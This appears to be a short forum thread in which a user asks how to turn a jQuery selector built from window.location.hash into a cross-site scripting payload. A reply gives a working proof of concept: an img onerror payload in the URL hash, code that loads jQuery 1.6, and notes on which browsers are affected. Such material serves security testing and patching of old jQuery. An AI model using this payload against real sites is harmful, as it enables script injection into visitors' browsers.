I came across to this code snippet, I wonder if anybody knows how to bypass the # sign that make my payload syntax problematic and write a successful XSS payload for this case.
var hashvalue = window.location.hash.substring(1);
var i = $(’#’ + hashvalue);
when I use something like www.example.com/index.html#alert(1234); i value becomes #alert(1234) and payload doesn’t work. Any suggestion will be appreciated.
Thanks in advance
Yes, it’s exploitable on Chrome (and Edge/IE I think, not Firefox) when using jQuery version <=1.6 (unpatched 1.6)
POC:
Go to any URL that does not use jQuery and append #<img/src='kungenosilvia'/onerror=javascript:alert(1)>
Open developer tools (f12) and type:
s = document.createElement(“script”);
s.type = “application/javascript”;
s.src=“https://code.jquery.com/jquery-1.6.js”;
(document.getElementsByTagName(“head”)[0] || document.documentElement).appendChild(s);
Finally, execute: $(location.hash);
Note, it doesn’t work in Firefox because location.hash returns < and > percent-encoded.